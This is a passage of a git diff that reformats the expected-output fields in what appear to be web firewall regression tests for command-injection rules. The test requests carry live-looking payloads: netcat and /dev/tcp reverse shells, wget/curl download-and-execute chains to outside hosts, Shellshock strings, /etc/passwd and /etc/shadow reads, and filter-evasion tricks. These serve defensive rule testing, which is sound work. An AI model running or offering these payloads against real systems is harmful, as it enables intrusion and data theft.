HTTP/1.1 output: - no_log_contains: id "932175" + log: + no_expect_ids: [932175] - test_id: 8 desc: "Negative test alias with quotes" stages: @@ -137,7 +144,8 @@ tests: "text=The%20pizza%20vendor%20was%20known%20by%20the%20alias%20%22pineapple%22%20online." version: HTTP/1.1 output: - no_log_contains: id "932175" + log: + no_expect_ids: [932175] - test_id: 9 desc: "Status Page Test - Test for simple alias example" stages: @@ -152,7 +160,8 @@ tests: uri: "/get?rce=alias%20a=b" version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 10 desc: "Test for alias with -p argument" stages: @@ -169,7 +178,8 @@ tests: rce=alias -p jzfrx=id version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 11 desc: "Test for alias with zsh flags" stages: @@ -186,7 +196,8 @@ tests: rce=alias -gmr a=b version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 12 desc: | Test for alias with zsh '+' flags. @@ -203,7 +214,8 @@ tests: uri: "/get?rce=%61%6c%69%61%73%20%2b%6d%20%61%3d%62" version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 13 desc: | Test for alias with trailing '+' in a flag. @@ -220,7 +232,8 @@ tests: uri: "/get?rce=%61%6c%69%61%73%20%2b%67%2b%20%61%3d%62" version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 14 desc: "Test for alias with zsh flags" stages: @@ -237,7 +250,8 @@ tests: rce=alias ls-al='ls -al' version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 15 desc: "Test for alias with zsh flags" stages: @@ -254,4 +268,5 @@ tests: rce=alias ..='cd ..' version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml index 856f3ea8d..fa512935b 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml @@ -20,7 +20,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932180" + log: + expect_ids: [932180] - test_id: 2 desc: "Test file upload with multipart/form-data and filename config.yml" stages: @@ -49,7 +50,8 @@ tests: BINARYDATA ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- output: - log_contains: id "932180" + log: + expect_ids: [932180] - test_id: 3 desc: "File upload - negative test" stages: @@ -76,4 +78,5 @@ tests: BINARYDATA --0000-- output: - no_log_contains: id "932180" + log: + no_expect_ids: [932180] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml index 0ad487b6d..2e2b5ae9b 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml @@ -19,7 +19,8 @@ tests: uri: "/get?id=cat%2B%2Fet*%2F*wd" version: HTTP/1.0 output: - log_contains: id "932190" + log: + expect_ids: [932190] - test_id: 2 desc: "Match wild card evasion in 'cat+/ET*/*WD'" stages: @@ -35,7 +36,8 @@ tests: uri: "/get?id=cat%2B%2FET*%2F*WD" version: HTTP/1.0 output: - log_contains: id "932190" + log: + expect_ids: [932190] - test_id: 3 desc: "Match wild card evasion in '/???/?s'" stages: @@ -51,7 +53,8 @@ tests: uri: "/get?id=%2F%3F%3F%3F%2F%3Fs" version: HTTP/1.0 output: - log_contains: id "932190" + log: + expect_ids: [932190] - test_id: 4 desc: "No FP in 'Does the * shine bright?'" stages: @@ -67,7 +70,8 @@ tests: uri: "/get?id=Does%20the%20%2A%20shine%20bright%3F" version: HTTP/1.0 output: - no_log_contains: id "932190" + log: + no_expect_ids: [932190] - test_id: 5 desc: "Handle single quote evasion mixed with wild card evasion" stages: @@ -85,7 +89,8 @@ tests: version: HTTP/1.0 data: "{\"foo\" : \";+cat+/e't'*/pa'?s'wd\"}" output: - log_contains: id "932190" + log: + expect_ids: [932190] - test_id: 6 desc: "Handle backslash evasion mixed with wild card evasion" stages: @@ -103,4 +108,5 @@ tests: version: HTTP/1.0 data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" output: - log_contains: id "932190" + log: + expect_ids: [932190] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml index 78c7f5ec9..f678da553 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 2 desc: uninitialized variable stages: @@ -33,7 +34,8 @@ tests: uri: "/get?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 3 desc: bash function stages: @@ -48,7 +50,8 @@ tests: uri: "/get?host=www.google.com;cat+/etc/%24%28echo%29passwd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 4 desc: uninitialized vars stages: @@ -63,7 +66,8 @@ tests: uri: "/get?host=www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 5 desc: uninitialized vars stages: @@ -78,7 +82,8 @@ tests: uri: "/get?host=www.google.com;c%24%21at%2B%2Fet%24%21c%2Fpas%24%21swd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 6 desc: uninitialized vars stages: @@ -93,7 +98,8 @@ tests: uri: "/get?host=www.google.com;c%24%2Aat%2B%2Fet%24%2Ac%2Fpas%24%2Aswd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 7 desc: uninitialized vars stages: @@ -108,7 +114,8 @@ tests: uri: "/get?host=www.google.com;c%24%3Fat%2B%2Fet%24%3Fc%2Fpas%24%3Fswd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 8 desc: uninitialized vars stages: @@ -123,7 +130,8 @@ tests: uri: "/get?host=www.google.com;c%24-at%2B%2Fet%24-c%2Fpas%24-swd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 9 desc: uninitialized vars stages: @@ -138,7 +146,8 @@ tests: uri: "/get?host=www.google.com;c%24_at%2B%2Fet%24_c%2Fpas%24_swd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 10 desc: uninitialized vars stages: @@ -153,7 +162,8 @@ tests: uri: "/get?host=www.google.com;c%24%24at%2B%2Fet%24%24c%2Fpas%24%24swd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 11 desc: "Test first backslash match ([*?`\\'][^/\n]+/) with: c\at /etc/passwd" stages: @@ -168,7 +178,8 @@ tests: uri: "/get?host=www.google.com;c%5Cat%20%2Fetc%2Fpasswd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 12 desc: "Test second backslash match (/[^/]+?[*?`\\']) with: cat /etc/p\asswd" stages: @@ -183,7 +194,8 @@ tests: uri: "/get?host=www.google.com;cat%20%2Fetc%2Fp%5Casswd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 13 desc: "Test correct logging" stages: @@ -214,7 +226,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 15 desc: "Add test to match BB EBIDJ91T" stages: @@ -230,7 +243,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 16 desc: "Add test to match BB MKXQCJMX" stages: @@ -246,4 +260,5 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml index 4873cd347..1fd9e4408 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml @@ -19,7 +19,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932205" + log: + expect_ids: [932205] - test_id: 2 desc: Referer header with query string and obvious payload stages: @@ -35,7 +36,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932205" + log: + expect_ids: [932205] - test_id: 3 desc: Referer header with canonical path, query string and obvious payload stages: @@ -51,7 +53,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932205" + log: + expect_ids: [932205] - test_id: 4 desc: False positive test against query string and space in a parameter stages: @@ -67,7 +70,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932205" + log: + no_expect_ids: [932205] - test_id: 5 desc: False positive test against query string and space in path stages: @@ -83,7 +87,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932205" + log: + no_expect_ids: [932205] - test_id: 6 desc: False positive test against syntax highlighter (generic) stages: @@ -99,7 +104,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932205" + log: + no_expect_ids: [932205] - test_id: 7 desc: False positive test against fragment (scroll to text fragment) stages: @@ -115,4 +121,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932205" + log: + no_expect_ids: [932205] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml index dfbd11e85..3cfb335e8 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml @@ -19,7 +19,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932206" + log: + expect_ids: [932206] - test_id: 2 desc: False positive test against URL stages: @@ -35,7 +36,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932206" + log: + no_expect_ids: [932206] - test_id: 3 desc: False positive test against query string and space in path stages: @@ -51,4 +53,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932206" + log: + no_expect_ids: [932206] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml index 568668e67..ff3a3d8b1 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" version: HTTP/1.0 output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 2 desc: "%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: @@ -33,7 +34,8 @@ tests: uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" version: HTTP/1.0 output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 3 desc: ";\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: @@ -48,7 +50,8 @@ tests: uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n" version: HTTP/1.0 output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 4 desc: ";\n.databases" stages: @@ -63,7 +66,8 @@ tests: uri: "/get?foo=;\\n.databases" version: HTTP/1.0 output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 5 desc: "Fix N9FKP2XQ: .sh whoami" stages: @@ -78,7 +82,8 @@ tests: uri: "/get/juiceshop?s=1;.sh+whoami" version: HTTP/1.0 output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 6 desc: "N9FKP2XQ" stages: @@ -95,7 +100,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 7 desc: "N9FKP2XQ" stages: @@ -112,4 +118,5 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "932210" + log: + expect_ids: [932210] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml index 22fea813a..f5e8edbcf 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml @@ -19,7 +19,8 @@ tests: data: "TEST=echo | php7.4" version: HTTP/1.0 output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 2 desc: "TEST=echo | ${php7.4}php7.4" stages: @@ -35,7 +36,8 @@ tests: data: "TEST=echo | ${php7.4}php7.4" version: HTTP/1.0 output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 3 desc: "whxami|sh+``" stages: @@ -51,7 +53,8 @@ tests: data: "whxami|sh+``" version: HTTP/1.0 output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 4 desc: "whxami|fish+``" stages: @@ -67,7 +70,8 @@ tests: data: "whxami|fish+``" version: HTTP/1.0 output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 5 desc: "Negative test" stages: @@ -83,7 +87,8 @@ tests: data: "echo | curx" version: HTTP/1.0 output: - no_log_contains: id "932220" + log: + no_expect_ids: [932220] - test_id: 6 desc: | Test for BB finding 9P5LL13Y @@ -102,7 +107,8 @@ tests: echo "foo;whxam"i | tr x o | sh #" version: HTTP/1.1 output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 7 desc: "Block evasion using here string" stages: @@ -119,7 +125,8 @@ tests: data: | code=cat<<<ifconfig | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 8 desc: "Block evasion using here string with space" stages: @@ -136,7 +143,8 @@ tests: data: | code=cat<<< ifconfig | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 9 desc: "Block evasion using here string with single quotes" stages: @@ -153,7 +161,8 @@ tests: data: | code=cat<<<'ifconfig' | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 10 desc: "Block evasion using here string with double quotes" stages: @@ -170,7 +179,8 @@ tests: data: | code=cat<<<"ifconfig" | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 11 desc: "Block evasion using here string with command substitution" stages: @@ -187,7 +197,8 @@ tests: data: | code=cat<<<$(whoami | sh) output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 12 desc: "Block `time` prefix" stages: @@ -204,7 +215,8 @@ tests: data: | code=time whoami | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 13 desc: "Block `strace` prefix" stages: @@ -221,7 +233,8 @@ tests: data: | code=strace whoami | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 14 desc: "Block `nohup` prefix" stages: @@ -238,4 +251,5 @@ tests: data: | code=nohup whoami | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml index 843002bf6..47814322e 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml @@ -23,7 +23,8 @@ tests: uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 2 desc: System Command Injection (932230) from old modsec regressions stages: @@ -42,7 +43,8 @@ tests: uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 3 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: @@ -61,7 +63,8 @@ tests: data: "arg=Something+true+positive+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 4 desc: Like 932230-3 but instead of space sign using new line sign stages: @@ -80,7 +83,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.%0D%0AThis+is+the+new+line.+After+it+more+characters%0D%0AAnd+the+3rd+line+goes+here" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 5 desc: Another html entity - decimal 9977 (person with ball) with space sign after entity and dot stages: @@ -99,7 +103,8 @@ tests: data: "arg=Another+entity+and+the+dot+after+it+and+space+%26%239977%3B.+and+more." version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 6 desc: Another html entity - decimal 128 (euro) with new line sign after entity and dot stages: @@ -118,7 +123,8 @@ tests: data: "arg=Euro+entity+%26%238364%3B.%0D%0Aand+the+new+line+after+entity+and+dot" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 7 desc: arg value of ";ifconfig Something „The Title”. After space or new line more characters" is blocked stages: @@ -137,7 +143,8 @@ tests: data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 8 desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked stages: @@ -156,7 +163,8 @@ tests: data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 9 desc: Positive test - RCE passed in one of the args stages: @@ -176,7 +184,8 @@ tests: arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 10 desc: RCE from test 932230.yaml combined with html entities in the middle stages: @@ -195,7 +204,8 @@ tests: data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 11 desc: RCE from test 932230.yaml combined with html entities at the beginning stages: @@ -214,7 +224,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 12 desc: RCE from test 932230.yaml combined with html entities at the end stages: @@ -233,7 +244,8 @@ tests: data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 13 desc: RCE from https://github.com/payloadbox/command-injection-payload-list and html entities stages: @@ -252,7 +264,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=()+{+:;};+/bin/sh+-c+\"sleep+6+&&+echo+vulnerable+6\"" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 14 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: @@ -271,7 +284,8 @@ tests: data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 15 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: @@ -290,7 +304,8 @@ tests: data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 16 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: @@ -309,7 +324,8 @@ tests: data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 17 desc: RCE ;top with html entities two digit decimal of 59 (;) stages: @@ -328,7 +344,8 @@ tests: data: "arg=%26%2359%3B+;top" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 18 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: @@ -347,7 +364,8 @@ tests: data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 19 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: @@ -366,7 +384,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 20 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: @@ -385,7 +404,8 @@ tests: data: "arg=%0Acat%20/etc/passwd;+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 21 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: @@ -404,7 +424,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+%0Acat%20/etc/passwd;" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 22 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the end stages: @@ -423,7 +444,8 @@ tests: data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 23 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: @@ -442,7 +464,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\"" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 24 desc: RCE in arg and html entity is sent in cookie stages: @@ -462,7 +485,8 @@ tests: data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 25 desc: RCE in arg and html entity is sent in cookie stages: @@ -482,7 +506,8 @@ tests: data: "arg=()%20{%20:;};%20/bin/sh%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\`\"" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 26 desc: "Unix command injection" stages: @@ -498,7 +523,8 @@ tests: data: "var=` /bin/cat /etc/passwd`" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 27 desc: "Unix command injection" stages: @@ -514,7 +540,8 @@ tests: data: "var=`cut crs312``dig 34test`" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 28 desc: Test RCE with new semantic versions - ;gcc10.1 stages: @@ -533,7 +560,8 @@ tests: data: "arg=;gcc10.1<<<void main(){}" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 29 desc: Test RCE with new semantic versions - ;irb31 stages: @@ -552,7 +580,8 @@ tests: data: "arg=;irb<<<1+2" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 30 desc: System Command Injection bypass with time negative test stages: @@ -569,7 +598,8 @@ tests: uri: "/get?foo=time+warner" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 31 desc: System Command Injection test for BB finding 935E1D91 stages: @@ -586,7 +616,8 @@ tests: uri: "/get?foo=time+sh+-c+whoami" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 32 desc: System Command Injection test for BB finding 935E1D91 - time evasion attempt stages: @@ -603,7 +634,8 @@ tests: uri: "/get?foo=ti''me+sh+-c+whoami" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 33 desc: System Command Injection test for BB finding AV6ZO3ZS - mixed case stages: @@ -620,7 +652,8 @@ tests: uri: "/get?foo='TiMe+Sh+-c+whoami" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 34 desc: System Command Injection test for BB finding 9JJOOBTP - sh -c stages: @@ -637,7 +670,8 @@ tests: uri: "/get?'cmd%3Da%3B%20sh%24XX%20-c%20whoami" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 35 desc: "Negative test on German numbering - Schauen Sie sich diese Zahl an: 1'000'000" stages: @@ -656,7 +690,8 @@ tests: text=Schauen%20Sie%20sich%20diese%20Zahl%20an%3A%201%27000%27000 version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 36 desc: "Positive test - BB BBBZARPI - d=/dev&&(sh)0>$d/tcp/51.15.142.164/777" stages: @@ -673,7 +708,8 @@ tests: uri: "/get?cmd=d%3D%2Fdev%26%26(sh)0%3E%24d%2Ftcp%2F51.15.142.164%2F777" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] - test_id: 37 desc: "55O5COJ5" stages: @@ -690,7 +726,8 @@ tests: code=;c89 -wrapper sh,-c,id . version: HTTP/1.0 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 38 desc: "55O5COJ5" stages: @@ -707,7 +744,8 @@ tests: code=;c89 